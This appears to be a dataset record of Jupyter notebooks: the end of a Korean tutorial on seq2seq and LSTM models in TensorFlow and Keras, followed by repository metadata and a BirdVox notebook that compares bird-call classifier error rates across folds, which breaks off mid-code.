dec_input: output_batch,\n targets: target_batch})\n cost_val.append(loss)\n \n if (epoch+1) % 200 ==0:\n print(\"Epoch: {:04d}, cost: {}\".format(epoch+1, loss))\n \n \nprint(\"\\noptimization complete\")", "Epoch: 0200, cost: 0.07781609892845154\nEpoch: 0400, cost: 0.025294050574302673\nEpoch: 0600, cost: 0.008742648176848888\nEpoch: 0800, cost: 0.004197845701128244\nEpoch: 1000, cost: 0.008464171551167965\n\noptimization complete\n" ], [ "import matplotlib.pyplot as plt\n%matplotlib inline\n\nplt.rcParams[\"axes.unicode_minus\"] = False\n\nplt.figure(figsize=(20, 10))\nplt.title(\"cost\")\nplt.plot(cost_val, linewidth=1, alpha=0.8)\nplt.show()", "_____no_output_____" ], [ "def translate(word):\n seq_data = [word, \"P\" * len(word)]\n \n input_batch, output_batch, target_batch = make_batch([seq_data])\n prediction = tf.argmax(model, 2)\n \n result = sess.run(prediction, feed_dict={enc_input: input_batch,\n dec_input: output_batch,\n targets: target_batch})\n decoded = [char_arr[i] for i in result[0]]\n \n try:\n end = decoded.index(\"E\")\n translated = \"\".join(decoded[:end])\n return translated\n \n except Exception as ex:\n pass\n \n \n \n \n \nprint(\"\\n ==== translate test ====\")\n\nprint(\"word -> {}\".format(translate(\"word\")))\nprint(\"wodr -> {}\".format(translate(\"wodr\")))\nprint(\"love -> {}\".format(translate(\"love\")))\nprint(\"loev -> {}\".format(translate(\"loev\")))\nprint(\"bogn -> {}\".format(translate(\"bogn\")))\nprint(\"uruu -> {}\".format(translate(\"uruu\")))\nprint(\"abcd -> {}\".format(translate(\"abcd\")))", "\n ==== translate test ====\nword -> 단어\nwodr -> 단무\nlove -> 사랑\nloev -> 사랑\nbogn -> 봉구\nuruu -> 우루\nabcd -> 놀봉구\n" ] ], [ [ "# 자동 단어 완성 !! (3글자 ==> 4글자)", "_____no_output_____" ], [ "![title](images/word_auto.png)", "_____no_output_____" ] ], [ [ "import tensorflow.compat.v1 as tf\nimport numpy as np\n\nchar_arr = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\",\n \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\",\n \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\",\n \"v\", \"w\", \"x\", \"y\", \"z\"]\n\nnum_dic = {n: i for i, n in enumerate(char_arr)}\ndic_len = len(num_dic)\n\n\nseq_data = [\"word\", \"wood\", \"deep\", \"dive\", \"cold\", \"cool\", \"load\", \"love\", \"kiss\", \"kind\"]", "_____no_output_____" ], [ "def make_batch(seq_data):\n input_batch = []\n target_batch = []\n \n for seq in seq_data:\n input = [num_dic[n] for n in seq[:-1]]\n target = num_dic[seq[-1]]\n input_batch.append(np.eye(dic_len)[input])\n target_batch.append(target)\n \n return input_batch, target_batch", "_____no_output_____" ], [ "learning_rate = 0.001\nn_hidden = 128\ntotal_epoch = 10000\n\nn_step = 3\nn_input = n_class = dic_len\n\n\n\nX = tf.placeholder(tf.float32, [None, n_step, n_input], name=\"input_X\")\nY = tf.placeholder(tf.int32, [None])\n\nW = tf.Variable(tf.random_normal([n_hidden, n_class]))\nb = tf.Variable(tf.random_normal([n_class]))\n\n\n", "_____no_output_____" ], [ "cell1 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden)\ncell1 = tf.nn.rnn_cell.DropoutWrapper(cell1, output_keep_prob=0.5)\ncell2 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden)\n\n# MultiRNNCell 함수를 사용하여 조합\nmulti_cell = tf.nn.rnn_cell.MultiRNNCell([cell1, cell2])\noutputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32)\n\n\noutputs = tf.transpose(outputs, [1, 0, 2])\noutputs = outputs[-1]\nmodel = tf.matmul(outputs, W) + b", "WARNING:tensorflow:From <ipython-input-15-7ed5499ca873>:1: BasicLSTMCell.__init__ (from tensorflow.python.ops.rnn_cell_impl) is deprecated and will be removed in a future version.\nInstructions for updating:\nThis class is equivalent as tf.keras.layers.LSTMCell, and will be replaced by that in Tensorflow 2.0.\nWARNING:tensorflow:From <ipython-input-15-7ed5499ca873>:6: MultiRNNCell.__init__ (from tensorflow.python.ops.rnn_cell_impl) is deprecated and will be removed in a future version.\nInstructions for updating:\nThis class is equivalent as tf.keras.layers.StackedRNNCells, and will be replaced by that in Tensorflow 2.0.\n" ], [ "cost = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(logits=model, labels=Y) \n)\nopt = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n", "_____no_output_____" ], [ "init = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\ninput_batch, output_batch = make_batch(seq_data)\n\ncost_epoch = []\nfor epoch in range(total_epoch):\n _, loss = sess.run([opt, cost], feed_dict={X: input_batch, Y: output_batch})\n cost_epoch.append(loss)\n \n if (epoch+1) % 2000 ==0:\n print(\"Epoch: {}, cost= {}\".format(epoch+1, loss))\n \nprint(\"\\noptimization complete\")", "Epoch: 2000, cost= 4.428016836754978e-05\nEpoch: 4000, cost= 1.1086447102570673e-06\nEpoch: 6000, cost= 0.00020040673553012311\nEpoch: 8000, cost= 1.192092824453539e-08\nEpoch: 10000, cost= 3.576278473360617e-08\n\noptimization complete\n" ], [ "import matplotlib.pyplot as plt\n%matplotlib inline\n\n\nplt.rcParams[\"axes.unicode_minus\"] = False\nplt.figure(figsize=(20,6))\nplt.title(\"cost\")\nplt.plot(cost_epoch, linewidth=1)\nplt.show()", "_____no_output_____" ], [ "prediction = tf.cast(tf.argmax(model, 1), tf.int32)\nprediction_check = tf.equal(prediction, Y)\naccuracy = tf.reduce_mean(tf.cast(prediction_check, tf.float32))\n\n\ninput_batch, target_batch = make_batch(seq_data)\n\npredict, accuracy_val = sess.run([prediction, accuracy], \n feed_dict={X: input_batch, Y: target_batch})\n\n\n\npredict_word = []\nfor idx, val in enumerate(seq_data):\n last_char = char_arr[predict[idx]]\n predict_word.append(val[:3] + last_char)\n \nprint(\"\\n==== prediction ====\")\nprint(\"input_value: \\t\\t{}\".format([w[:3] for w in seq_data]))\nprint(\"prediction_value: \\t{}\".format(predict_word))\nprint(\"accuracy: {:.3f}\".format(accuracy_val))\n\n\n\n\n", "\n==== prediction ====\ninput_value: \t\t['wor', 'woo', 'dee', 'div', 'col', 'coo', 'loa', 'lov', 'kis', 'kin']\nprediction_value: \t['word', 'wood', 'deep', 'dive', 'cold', 'cool', 'load', 'love', 'kiss', 'kind']\naccuracy: 1.000\n" ] ], [ [ "# 4.ipynb 에서 attention 개념 위해 사용하는 toy 코드\n\n<p> &nbsp;\n \n# +++++++++++++++++++++++++++++++++++++++++++++++++++\n \n<p> &nbsp;\n \n### [과제] 실행시간이 오래 걸림 . 저장된 모델 불러오는 기능을 추가. \n \n### [과제] 구글 번역기로 한글 charbot 데이터를 영어로 번역하고 탐구.", "_____no_output_____" ] ], [ [ "from __future__ import print_function\n\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense\nimport numpy as np\n\nbatch_size = 64 # Batch size for training.\nepochs = 3 # 100 # Number of epochs to train for.\nlatent_dim = 256 # Latent dimensionality of the encoding space.\nnum_samples = 10000 # Number of samples to train on.\n# Path to the data txt file on disk.\ndata_path = 'data_nmt/data/kor.txt'\n\n# Vectorize the data.\ninput_texts = []\ntarget_texts = []\ninput_characters = set()\ntarget_characters = set()\nwith open(data_path, 'r', encoding='utf-8') as f:\n lines = f.read().split('\\n')\nfor line in lines[: min(num_samples, len(lines) - 1)]:\n input_text, target_text, rest = line.split('\\t')\n # We use \"tab\" as the \"start sequence\" character\n # for the targets, and \"\\n\" as \"end sequence\" character.\n target_text = '\\t' + target_text + '\\n'\n input_texts.append(input_text)\n target_texts.append(target_text)\n for char in input_text:\n if char not in input_characters:\n input_characters.add(char)\n for char in target_text:\n if char not in target_characters:\n target_characters.add(char)\n\ninput_characters = sorted(list(input_characters))\ntarget_characters = sorted(list(target_characters))\nnum_encoder_tokens = len(input_characters)\nnum_decoder_tokens = len(target_characters)\nmax_encoder_seq_length = max([len(txt) for txt in input_texts])\nmax_decoder_seq_length = max([len(txt) for txt in target_texts])\n\nprint('Number of samples:', len(input_texts))\nprint('Number of unique input tokens:', num_encoder_tokens)\nprint('Number of unique output tokens:', num_decoder_tokens)\nprint('Max sequence length for inputs:', max_encoder_seq_length)\nprint('Max sequence length for outputs:', max_decoder_seq_length)\n\ninput_token_index = dict(\n [(char, i) for i, char in enumerate(input_characters)])\ntarget_token_index = dict(\n [(char, i) for i, char in enumerate(target_characters)])\n\nencoder_input_data = np.zeros(\n (len(input_texts), max_encoder_seq_length, num_encoder_tokens),\n dtype='float32')\ndecoder_input_data = np.zeros(\n (len(input_texts), max_decoder_seq_length, num_decoder_tokens),\n dtype='float32')\ndecoder_target_data = np.zeros(\n (len(input_texts), max_decoder_seq_length, num_decoder_tokens),\n dtype='float32')\n\nfor i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)):\n for t, char in enumerate(input_text):\n encoder_input_data[i, t, input_token_index[char]] = 1.\n encoder_input_data[i, t + 1:, input_token_index[' ']] = 1.\n for t, char in enumerate(target_text):\n # decoder_target_data is ahead of decoder_input_data by one timestep\n decoder_input_data[i, t, target_token_index[char]] = 1.\n if t > 0:\n # decoder_target_data will be ahead by one timestep\n # and will not include the start character.\n decoder_target_data[i, t - 1, target_token_index[char]] = 1.\n decoder_input_data[i, t + 1:, target_token_index[' ']] = 1.\n decoder_target_data[i, t:, target_token_index[' ']] = 1.\n# Define an input sequence and process it.\nencoder_inputs = Input(shape=(None, num_encoder_tokens))\nencoder = LSTM(latent_dim, return_state=True)\nencoder_outputs, state_h, state_c = encoder(encoder_inputs)\n# We discard `encoder_outputs` and only keep the states.\nencoder_states = [state_h, state_c]\n\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, num_decoder_tokens))\n# We set up our decoder to return full output sequences,\n# and to return internal states as well. We don't use the\n# return states in the training model, but we will use them in inference.\ndecoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)\ndecoder_outputs, _, _ = decoder_lstm(decoder_inputs,\n initial_state=encoder_states)\ndecoder_dense = Dense(num_decoder_tokens, activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\n# Run training\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.fit([encoder_input_data, decoder_input_data], decoder_target_data,\n batch_size=batch_size,\n epochs=epochs,\n validation_split=0.2)\n# Save model\nmodel.save('./data_nmt/data/s2s.h5')\n\n# Next: inference mode (sampling).\n# Here's the drill:\n# 1) encode input and retrieve initial decoder state\n# 2) run one step of decoder with this initial state\n# and a \"start of sequence\" token as target.\n# Output will be the next target token\n# 3) Repeat with the current target token and current states\n\n# Define sampling models\nencoder_model = Model(encoder_inputs, encoder_states)\n\ndecoder_state_input_h = Input(shape=(latent_dim,))\ndecoder_state_input_c = Input(shape=(latent_dim,))\ndecoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\ndecoder_outputs, state_h, state_c = decoder_lstm(\n decoder_inputs, initial_state=decoder_states_inputs)\ndecoder_states = [state_h, state_c]\ndecoder_outputs = decoder_dense(decoder_outputs)\ndecoder_model = Model(\n [decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states)\n\n# Reverse-lookup token index to decode sequences back to\n# something readable.\nreverse_input_char_index = dict(\n (i, char) for char, i in input_token_index.items())\nreverse_target_char_index = dict(\n (i, char) for char, i in target_token_index.items())\n\n\ndef decode_sequence(input_seq):\n # Encode the input as state vectors.\n states_value = encoder_model.predict(input_seq)\n\n # Generate empty target sequence of length 1.\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n # Populate the first character of target sequence with the start character.\n target_seq[0, 0, target_token_index['\\t']] = 1.\n\n # Sampling loop for a batch of sequences\n # (to simplify, here we assume a batch of size 1).\n stop_condition = False\n decoded_sentence = ''\n while not stop_condition:\n output_tokens, h, c = decoder_model.predict(\n [target_seq] + states_value)\n\n # Sample a token\n sampled_token_index = np.argmax(output_tokens[0, -1, :])\n sampled_char = reverse_target_char_index[sampled_token_index]\n decoded_sentence += sampled_char\n\n # Exit condition: either hit max length\n # or find stop character.\n if (sampled_char == '\\n' or\n len(decoded_sentence) > max_decoder_seq_length):\n stop_condition = True\n\n # Update the target sequence (of length 1).\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n target_seq[0, 0, sampled_token_index] = 1.\n\n # Update states\n states_value = [h, c]\n\n return decoded_sentence\n\n\nfor seq_index in range(100):\n # Take one sequence (part of the training set)\n # for trying out decoding.\n input_seq = encoder_input_data[seq_index: seq_index + 1]\n decoded_sentence = decode_sequence(input_seq)\n print('-')\n print('Input sentence:', input_texts[seq_index])\n print('Decoded sentence:', decoded_sentence)", "Number of samples: 3318\nNumber of unique input tokens: 75\nNumber of unique output tokens: 891\nMax sequence length for inputs: 537\nMax sequence length for outputs: 298\nTrain on 2654 samples, validate on 664 samples\nEpoch 1/100\n2654/2654 [==============================] - 473s 178ms/step - loss: 0.6580 - accuracy: 0.9389 - val_loss: 0.4219 - val_accuracy: 0.9375\nEpoch 2/100\n2654/2654 [==============================] - 570s 215ms/step - loss: 0.2244 - accuracy: 0.9626 - val_loss: 0.4568 - val_accuracy: 0.9375\nEpoch 3/100\n 192/2654 [=>............................] - ETA: 9:17 - loss: 0.2123 - accuracy: 0.9642" ] ] ]
[ "markdown", "raw", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown" ], [ "raw" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1c2999e9f0d97c67c520bbfed9c6feeb6210ab
616,756
ipynb
Jupyter Notebook
spl2018/fig_binary-classification.ipynb
BirdVox/bv_context_adaptation
9bd446326ac927d72f7c333eac07ee0490fc3127
[ "MIT" ]
5
2018-10-17T21:17:26.000Z
2019-06-14T01:48:29.000Z
spl2018/fig_binary-classification.ipynb
BirdVox/bv_context_adaptation
9bd446326ac927d72f7c333eac07ee0490fc3127
[ "MIT" ]
null
null
null
spl2018/fig_binary-classification.ipynb
BirdVox/bv_context_adaptation
9bd446326ac927d72f7c333eac07ee0490fc3127
[ "MIT" ]
3
2018-12-22T00:04:43.000Z
2021-06-09T20:02:28.000Z
245.523885
107,864
0.891669
[ [ [ "import csv\nimport numpy as np\nimport os\nimport pandas as pd\nimport scipy.interpolate\nimport sklearn.metrics\nimport sys\nsys.path.append(\"../src\")\nimport localmodule\n\n\nif sys.version_info[0] < 3: \n from StringIO import StringIO\nelse:\n from io import StringIO\n\n\nfrom matplotlib import pyplot as plt\n%matplotlib inline\n\n# Define constants.\ndataset_name = localmodule.get_dataset_name()\nmodels_dir = localmodule.get_models_dir()\nunits = localmodule.get_units()\nn_units = len(units)\nn_trials = 10\n", "_____no_output_____" ], [ "import tqdm\n\nmodel_names = [\n \"icassp-convnet\", \"icassp-convnet_aug-all-but-noise\", \"icassp-convnet_aug-all\", \n \"pcen-convnet\", \"pcen-convnet_aug-all-but-noise\", \"pcen-convnet_aug-all\",\n \"icassp-ntt-convnet\", \"icassp-ntt-convnet_aug-all-but-noise\", \"icassp-ntt-convnet_aug-all\",\n \"pcen-ntt-convnet\", \"pcen-ntt-convnet_aug-all-but-noise\", \"pcen-ntt-convnet_aug-all\",\n \"icassp-add-convnet\", \"icassp-add-convnet_aug-all-but-noise\", \"icassp-add-convnet_aug-all\",\n \"pcen-add-convnet\", \"pcen-add-convnet_aug-all-but-noise\", \"pcen-add-convnet_aug-all\",\n]\n\nn_models = len(model_names)\n\n\nfold_accs = []\nfor fold_id in range(6):\n\n model_accs = {}\n\n for model_name in tqdm.tqdm(model_names):\n \n val_accs = []\n \n for trial_id in range(10):\n\n model_dir = os.path.join(models_dir, model_name)\n test_unit_str = units[fold_id]\n test_unit_dir = os.path.join(model_dir, test_unit_str)\n trial_str = \"trial-\" + str(trial_id)\n trial_dir = os.path.join(test_unit_dir, trial_str)\n \n val_unit_strs = localmodule.fold_units()[fold_id][2]\n \n val_tn = 0\n val_tp = 0\n val_fn = 0\n val_fp = 0\n \n for val_unit_str in val_unit_strs:\n\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n trial_str,\n \"predict-\" + val_unit_str,\n \"clip-predictions.csv\"\n ])\n\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n\n # Load prediction.\n try:\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n\n y_pred = (y_pred > 0.5).astype('int')\n\n # Load ground truth.\n y_true = np.array(df[\"Ground truth\"])\n\n # Compute confusion matrix.\n tn, fp, fn, tp = sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n\n val_tn = val_tn + tn\n val_fp = val_fp + fp\n val_fn = val_fn + fn\n val_tp = val_tp + tp\n\n except:\n val_tn = -np.inf\n val_tp = -np.inf\n val_fn = -np.inf\n val_tp = -np.inf\n \n if val_tn < 0:\n val_acc = 0.0\n else:\n val_acc =\\\n 100 * (val_tn+val_tp) /\\\n (val_tn+val_tp+val_fn+val_fp)\n \n val_accs.append(val_acc)\n \n # Remove the models that did not train (accuracy close to 50%, i.e. chance)\n val_accs = [v for v in val_accs if v > 65.0]\n model_accs[model_name] = val_accs\n \n fold_accs.append(model_accs)", "100%|██████████| 18/18 [00:53<00:00, 2.97s/it]\n100%|██████████| 18/18 [00:44<00:00, 2.40s/it]\n100%|██████████| 18/18 [00:43<00:00, 2.18s/it]\n100%|██████████| 18/18 [00:51<00:00, 3.05s/it]\n100%|██████████| 18/18 [01:01<00:00, 2.79s/it]\n100%|██████████| 18/18 [00:39<00:00, 2.19s/it]\n" ], [ "fold_accs", "_____no_output_____" ], [ "fold_id = 0\n\n#model_accs = np.stack(list(fold_accs[fold_id].values()))[:,:]\n#plt.boxplot(model_accs.T);\n\nmodel_names = [\n \"icassp-convnet\", \"icassp-convnet_aug-all-but-noise\", \"icassp-convnet_aug-all\", \n \"pcen-convnet\", \"pcen-convnet_aug-all-but-noise\", \"pcen-convnet_aug-all\",\n \"icassp-ntt-convnet\", \"icassp-ntt-convnet_aug-all-but-noise\", \"icassp-ntt-convnet_aug-all\",\n \"pcen-ntt-convnet\", \"pcen-ntt-convnet_aug-all-but-noise\", \"pcen-ntt-convnet_aug-all\",\n \"icassp-add-convnet\", \"icassp-add-convnet_aug-all-but-noise\", \"icassp-add-convnet_aug-all\",\n \"pcen-add-convnet\", \"pcen-add-convnet_aug-all-but-noise\", \"pcen-add-convnet_aug-all\",\n]\n\n\n\n\nerrs = 100 - np.stack([np.median(x) for x in list(fold_accs[fold_id].values())])\nxmax = np.ceil(np.max(errs)) + 2.5\n\nfig = plt.figure(figsize=(xmax/2, 4), frameon=False)\n\nplt.plot(errs[0], [0], 'o', color='blue');\nplt.plot(errs[1], [1], 'o', color='blue');\nplt.plot(errs[2], [2], 'o', color='blue');\n\nplt.plot(errs[3], [0], 'o', color='orange');\nplt.plot(errs[4], [1], 'o', color='orange');\nplt.plot(errs[5], [2], 'o', color='orange');\n\nplt.text(-0.5, 1, 'no context\\nadaptation',\n horizontalalignment='center',\n verticalalignment='center',\n rotation=90, wrap=True)\n\n#plt.text(max(errs[0], errs[3]) + 1, 0, 'none');\n#plt.text(max(errs[1], errs[4]) + 1, 1, 'geometrical');\n#plt.text(max(errs[2], errs[5]) + 1, 2, 'adaptive');\n\n\nplt.plot(errs[6], [4], 'o', color='blue');\nplt.plot(errs[7], [5], 'o', color='blue');\nplt.plot(errs[8], [6], 'o', color='blue');\n\nplt.plot(errs[9], [4], 'o', color='orange');\nplt.plot(errs[10], [5], 'o', color='orange');\nplt.plot(errs[11], [6], 'o', color='orange');\n\nplt.text(-0.5, 5, 'mixture\\nof experts',\n horizontalalignment='center',\n verticalalignment='center',\n rotation=90, wrap=True)\n\n#plt.text(max(errs[6], errs[9]) + 1, 4, 'none');\n#plt.text(max(errs[7], errs[10]) + 1, 5, 'geometrical');\n#plt.text(max(errs[8], errs[11]) + 1, 6, 'adaptive');\n\n\nplt.plot(errs[12], [8], 'o', color='blue');\nplt.plot(errs[13], [9], 'o', color='blue');\nplt.plot(errs[14], [10], 'o', color='blue');\n\nplt.plot(errs[15], [8], 'o', color='orange');\nplt.plot(errs[16], [9], 'o', color='orange');\nplt.plot(errs[17], [10], 'o', color='orange');\n\nplt.text(-0.5, 9, 'adaptive\\nthreshold',\n horizontalalignment='center',\n verticalalignment='center',\n rotation=90, wrap=True)\n\n#plt.text(max(errs[12], errs[15]) + 1, 8, 'none');\n#plt.text(max(errs[13], errs[16]) + 1, 9, 'geometrical');\n#plt.text(max(errs[14], errs[17]) + 1, 10, 'adaptive');\n\n\nplt.plot([0, xmax], [3, 3], '--', color=[0.75, 0.75, 0.75], linewidth=1.0, alpha=0.5)\nplt.plot([0, xmax], [7, 7], '--', color=[0.75, 0.75, 0.75], linewidth=1.0, alpha=0.5)\n\nplt.xlim([0.0, xmax])\nplt.ylim([10.5, -0.5])\n\nax = fig.gca()\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_visible(False)\nax.spines['left'].set_visible(False)\n\nax.get_yaxis().set_ticks([])\n\nfig.gca().set_xticks(range(0, int(xmax)+1, 1));\nfig.gca().xaxis.grid(linestyle='--', alpha=0.5)\n\nplt.xlabel(\"Average miss rate (%)\")\n\n#plt.savefig(\"spl_bv-70k-benchmark_fold-\" + units[fold_id] + \".eps\")", "_____no_output_____" ], [ "model_names = [\n# \"icassp-convnet\", \"icassp-convnet_aug-all-but-noise\",\n# \"icassp-ntt-convnet\", \"icassp-ntt-convnet_aug-all-but-noise\",\n# \"icassp-add-convnet\", \"icassp-add-convnet_aug-all-but-noise\",\n# \"pcen-convnet\", \"pcen-convnet_aug-all-but-noise\",\n# \"pcen-ntt-convnet\", \"pcen-ntt-convnet_aug-all-but-noise\",\n# \"pcen-add-convnet\", \"pcen-add-convnet_aug-all-but-noise\",\n]\n\nmodel_names = [\n \"icassp-convnet\", \"icassp-ntt-convnet\", \"icassp-add-convnet\",\n \"icassp-convnet_aug-all-but-noise\", \"icassp-ntt-convnet_aug-all-but-noise\", \"icassp-add-convnet_aug-all-but-noise\",\n \"pcen-convnet\", \"pcen-ntt-convnet\", \"pcen-add-convnet\",\n \"pcen-convnet_aug-all-but-noise\", \"pcen-ntt-convnet_aug-all-but-noise\", \"pcen-add-convnet_aug-all-but-noise\"\n]\n\nplt.gca().invert_yaxis()\n\ncolors = [\n \"#CB0003\", # RED\n \"#E67300\", # ORANGE\n \"#990099\", # PURPLE\n \"#0000B2\", # BLUE\n \"#009900\", # GREEN\n# '#008888', # TURQUOISE\n# '#888800', # KAKI\n '#555555', # GREY\n]\n\nxticks = np.array([1.0, 1.5, 2, 2.5, 3, 4, 5, 6, 8, 10, 12, 16, 20])\n#xticks = np.array(range(1, 20))\nplt.xticks(np.log2(xticks))\n\nxtick_strs = []\nfor xtick in xticks:\n if np.abs(xtick - int(xtick)) == 0:\n xtick_strs.append(\"{:2d}\".format(int(xtick)))\n else:\n xtick_strs.append(\"{:1.1f}\".format(xtick))\n\nprint(xtick_strs)\nplt.gca().set_xticklabels(xtick_strs, family=\"serif\")\nplt.xlim([np.log2(xticks[0]), np.log2(22.0)])\n\nerrs = np.zeros((len(model_names), 6))\n\nfor fold_id in range(6):\n errs[:, fold_id] =\\\n np.log2(100 - np.array([np.median(fold_accs[fold_id][name]) for name in model_names]))\n #ys = [1, 2, 4, 5, 7, 8, 11, 12, 14, 15, 17, 18]\n ys = [1, 2, 3, 5, 6, 7, 10, 11, 12, 14, 15, 16]\n for i in range(len(model_names)):\n plt.plot(errs[i, fold_id], ys[i], 'o', color=colors[fold_id]);\n \nytick_dict = {\n \"icassp-convnet\": \" logmelspec \",\n \"icassp-convnet_aug-all-but-noise\": \"GDA ➡ logmelspec \",\n ##\n \"icassp-ntt-convnet\": \" logmelspec ➡ MoE\",\n \"icassp-ntt-convnet_aug-all-but-noise\": \"GDA ➡ logmelspec ➡ MoE\",\n ##\n \"icassp-add-convnet\": \" logmelspec ➡ AT \",\n \"icassp-add-convnet_aug-all-but-noise\": \"GDA ➡ logmelspec ➡ AT \",\n ###\n ###\n \"pcen-convnet\": \" PCEN \",\n \"pcen-convnet_aug-all-but-noise\": \"GDA ➡ PCEN \",\n ##\n \"pcen-ntt-convnet\": \" PCEN ➡ MoE\",\n \"pcen-ntt-convnet_aug-all-but-noise\": \"GDA ➡ PCEN ➡ MoE\",\n ##\n \"pcen-add-convnet\": \" PCEN ➡ AT \",\n \"pcen-add-convnet_aug-all-but-noise\": \"GDA ➡ PCEN ➡ AT \",\n}\n\nplt.yticks(ys)\nplt.gca().set_yticklabels([ytick_dict[m] for m in model_names], family=\"monospace\")\n\nplt.xlabel(\"Per-fold validation error rate (%)\", family=\"serif\")\n\n \nplt.gca().spines['left'].set_visible(False)\nplt.gca().spines['top'].set_visible(False)\nplt.gca().spines['right'].set_visible(False)\n\nplt.gca().grid(linestyle=\"--\")\n\nplt.savefig('fig_per-fold-validation.svg', bbox_inches=\"tight\")", "[' 1', '1.5', ' 2', '2.5', ' 3', ' 4', ' 5', ' 6', ' 8', '10', '12', '16', '20']\n" ], [ "np.sum(pareto > 0, axis=1)", "_____no_output_____" ], [ "n_val_trials = 1\n\nmodel_names = [\n \"icassp-convnet\", \"icassp-convnet_aug-all-but-noise\", \"icassp-convnet_aug-all\", \n \"icassp-ntt-convnet\", \"icassp-ntt-convnet_aug-all-but-noise\", \"icassp-ntt-convnet_aug-all\",\n \"pcen-convnet\", \"pcen-convnet_aug-all-but-noise\", \"pcen-convnet_aug-all\",\n \"icassp-add-convnet\", \"icassp-add-convnet_aug-all-but-noise\", \"icassp-add-convnet_aug-all\",\n \"pcen-add-convnet\", \"pcen-add-convnet_aug-all-but-noise\", \"pcen-add-convnet_aug-all\",\n \"pcen-ntt-convnet_aug-all-but-noise\", \"pcen-ntt-convnet_aug-all\",\n \"pcen-addntt-convnet_aug-all-but-noise\",\n]\nn_models = len(model_names)\nmodel_val_accs = {}\nmodel_test_accs = {}\n \n# Loop over models.\nfor model_id, model_name in enumerate(model_names):\n\n model_dir = os.path.join(models_dir, model_name)\n model_val_accs[model_name] = np.zeros((6,))\n model_test_accs[model_name] = np.zeros((6,))\n\n for test_unit_id in range(6):\n \n # TRIAL SELECTION\n test_unit_str = units[test_unit_id]\n test_unit_dir = os.path.join(model_dir, test_unit_str)\n val_accs = []\n for trial_id in range(n_trials):\n trial_str = \"trial-\" + str(trial_id)\n trial_dir = os.path.join(test_unit_dir, trial_str)\n history_name = \"_\".join([\n dataset_name,\n model_name,\n test_unit_str,\n trial_str,\n \"history.csv\"\n ])\n history_path = os.path.join(\n trial_dir, history_name)\n try:\n history_df = pd.read_csv(history_path)\n val_acc = max(history_df[\"Validation accuracy (%)\"])\n except:\n val_acc = 0.0\n val_accs.append(val_acc)\n\n val_accs = np.array(val_accs)\n trial_id = np.argmax(val_accs)\n\n \n # VALIDATION SET EVALUATION\n trial_str = \"trial-\" + str(trial_id)\n trial_dir = os.path.join(test_unit_dir, trial_str)\n \n fns, 